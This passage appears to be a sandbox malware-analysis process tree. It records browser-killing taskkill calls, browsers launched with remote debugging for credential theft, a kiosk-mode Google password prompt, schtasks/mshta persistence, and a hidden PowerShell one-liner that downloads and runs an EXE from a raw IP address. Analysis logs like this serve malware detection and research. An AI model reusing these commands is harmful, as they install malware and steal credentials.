                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2176 /prefetch:3
                                                              8⤵
                                                                PID:1680
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2236 /prefetch:8
                                                                8⤵
                                                                  PID:1064
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:4884
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:3796
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4464 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:1648
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4288,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
                                                                  8⤵
                                                                    PID:244
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4316,i,2226374523229208142,4094690784538083550,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4852 /prefetch:8
                                                                    8⤵
                                                                      PID:1404
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                    7⤵
                                                                    • Uses browser remote debugging
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    PID:3692
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcf6ff46f8,0x7ffcf6ff4708,0x7ffcf6ff4718
                                                                      8⤵
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      PID:2756
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
                                                                      8⤵
                                                                        PID:5472
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
                                                                        8⤵
                                                                          PID:5484
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                                                                          8⤵
                                                                            PID:5572
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:5752
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:5928
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:4804
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:5292
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
                                                                            8⤵
                                                                              PID:228
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
                                                                              8⤵
                                                                                PID:2384
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2616 /prefetch:2
                                                                                8⤵
                                                                                  PID:2804
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3892 /prefetch:2
                                                                                  8⤵
                                                                                    PID:5296
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3868 /prefetch:2
                                                                                    8⤵
                                                                                      PID:5916
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,7716052889953521855,15008812785711752731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3584 /prefetch:2
                                                                                      8⤵
                                                                                        PID:2856
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087597001\cd667b3d4a.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087597001\cd667b3d4a.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:3904
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM firefox.exe /T
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      PID:3944
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM chrome.exe /T
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      PID:4508
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM msedge.exe /T
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      PID:2800
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM opera.exe /T
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      PID:3720
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM brave.exe /T
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      PID:1896
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                      7⤵
                                                                                        PID:4548
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                          8⤵
                                                                                          • Checks processor information in registry
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:2720
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1880 -prefMapHandle 1872 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2853da8-f311-47ee-bd4f-2e07ab076bc8} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" gpu
                                                                                            9⤵
                                                                                              PID:2516
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64bad64f-108f-43c5-ab66-4f42662d58ca} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" socket
                                                                                              9⤵
                                                                                                PID:2448
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2844 -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2976 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {452917cf-4389-4418-a726-4322701187b0} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
                                                                                                9⤵
                                                                                                  PID:4864
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3824 -prefMapHandle 3908 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {667ca373-2073-47c7-a801-bc530c1e93c6} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
                                                                                                  9⤵
                                                                                                    PID:1132
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4836 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4824 -prefMapHandle 4820 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afe769ff-26c1-4abb-aff5-abb5c4cdf802} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" utility
                                                                                                    9⤵
                                                                                                    • Checks processor information in registry
                                                                                                    PID:6100
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 3 -isForBrowser -prefsHandle 5564 -prefMapHandle 5528 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dc63c5d-65dc-4d97-8681-56467e5b13a3} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
                                                                                                    9⤵
                                                                                                      PID:5660
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5768 -childID 4 -isForBrowser -prefsHandle 5668 -prefMapHandle 5672 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8fb70d0-be0f-4ce2-992e-a601bae61089} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
                                                                                                      9⤵
                                                                                                        PID:5680
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5988 -childID 5 -isForBrowser -prefsHandle 5748 -prefMapHandle 5752 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {827142f1-1ec0-4399-b174-caa235bf1de9} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
                                                                                                        9⤵
                                                                                                          PID:5740
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087598001\c28a74b6e3.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087598001\c28a74b6e3.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:3144
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn wlSapma9cSg /tr "mshta C:\Users\Admin\AppData\Local\Temp\gTGNNuu3A.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4464
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /create /tn wlSapma9cSg /tr "mshta C:\Users\Admin\AppData\Local\Temp\gTGNNuu3A.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                        8⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4812
                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                      mshta C:\Users\Admin\AppData\Local\Temp\gTGNNuu3A.hta
                                                                                                      7⤵
                                                                                                      • Checks computer location settings
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3364
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RCFNCEG4IL2JMGT1GWZPGYEDYKUKAIKP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                        8⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Downloads MZ/PE file
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1404
                                                                                                        • C:\Users\Admin\AppData\Local\TempRCFNCEG4IL2JMGT1GWZPGYEDYKUKAIKP.EXE
                                                                                                          "C:\Users\Admin\AppData\Local\TempRCFNCEG4IL2JMGT1GWZPGYEDYKUKAIKP.EXE"
                                                                                                          9⤵
                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Executes dropped EXE
                                                                                                          • Identifies Wine through registry keys
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4876
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087600001\9117126283.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087600001\9117126283.exe"
                                                                                                    6⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3944
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087611001\a4787ec609.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087611001\a4787ec609.exe"
                                                                                                    6⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Writes to the Master Boot Record (MBR)
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5276
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087612001\d2YQIJa.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087612001\d2YQIJa.exe"
                                                                                                    6⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2344
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087614001\7aencsM.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087614001\7aencsM.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:6040
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1087614001\7aencsM.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1087614001\7aencsM.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Checks processor information in registry
                                                                                                      PID:5084
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                        8⤵
                                                                                                        • Uses browser remote debugging
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                        PID:4240
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd0d8ecc40,0x7ffd0d8ecc4c,0x7ffd0d8ecc58
                                                                                                          9⤵
                                                                                                            PID:3168
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2024,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2020 /prefetch:2
                                                                                                            9⤵
                                                                                                              PID:2996
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2068 /prefetch:3
                                                                                                              9⤵
                                                                                                                PID:3592
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2036,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2304 /prefetch:8
                                                                                                                9⤵
                                                                                                                  PID:5128
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
                                                                                                                  9⤵
                                                                                                                  • Uses browser remote debugging
                                                                                                                  PID:5104
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3356 /prefetch:1
                                                                                                                  9⤵
                                                                                                                  • Uses browser remote debugging
                                                                                                                  PID:5556
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4472 /prefetch:1
                                                                                                                  9⤵
                                                                                                                  • Uses browser remote debugging
